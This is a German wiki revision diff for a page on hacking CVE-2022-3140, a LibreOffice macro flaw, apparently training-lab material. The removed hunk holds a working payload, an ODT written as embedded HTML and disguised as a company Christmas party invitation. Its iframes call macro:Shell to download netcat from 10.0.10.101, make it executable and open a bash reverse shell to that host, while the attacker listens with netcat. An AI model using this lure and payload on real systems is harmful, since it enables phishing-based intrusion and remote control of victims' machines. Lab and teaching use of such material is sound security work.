LibreOffice Makrolücke Hack (CVE-2022-3140): Unterschied zwischen den Versionen

Aus Xinux Wiki
Zur Navigation springen Zur Suche springen
Zeile 8: Zeile 8:
 
*netcat -lp 1234
 
*netcat -lp 1234
  
=ODT erstellen=
 
*cat weihnachtsfeier.odt
 
;Als embedded HTML
 
<pre>
 
<HTML>
 
<MAIN>
 
Liebes Team,</br>
 
  
die Müller GmbH lädt Sie herzlich zur Weihnachtsfeier am 27. November im Restaurant Bella Italia ein! </br>
 
Anschließend möchten wir den Abend in der Weinbar am Marktplatz ausklingen lassen.</br>
 
Treffpunkt ist um 17:30 Uhr vor dem Restaurant.</br>
 
</br>
 
</br>
 
Bitte geben Sie uns bis zum 27. November Bescheid, ob wir mit Ihrem Kommen rechnen können.</br>
 
</br>
 
Wir freuen uns auf Sie!</br>
 
</br>
 
Ihre Geschäftsführung</br>
 
  
</br>
 
  
<img src="http://10.0.10.101/weihnachtsmann.jpg" "height="100" width="200">
+
=ODT erstellen=
 
+
*[[LibreOffice Makrolücke Linux Backdoor]]
</br>
+
*[[LibreOffice Makrolücke Linux Open Site]]
<iframe src='macro:Shell("curl" , 0 ,"http://10.0.10.101/nc -o /tmp/nc",True)'></iframe>
+
*[[LibreOffice Makrolücke Windows Open Site]]
</br>
 
<iframe src='macro:Shell("chmod", 0, "755 /tmp/nc" , True )'></iframe>
 
</br>
 
<iframe src='macro:Shell("/tmp/nc", 0, "-e /bin/bash 10.0.10.101 1234", True)'></iframe>
 
</MAIN>
 
</HTML>
 
</pre>
 

Version vom 29. August 2024, 14:11 Uhr

Vorbereitung

Vorausetzung
  • Libre Office version 7.3 bis 7.3.5
Alte Pakete

Angreifer

  • netcat -lp 1234



ODT erstellen

Abgerufen von „http://wiki.ixheim.de/index.php?title=LibreOffice_Makrolücke_Hack_(CVE-2022-3140)&oldid=55957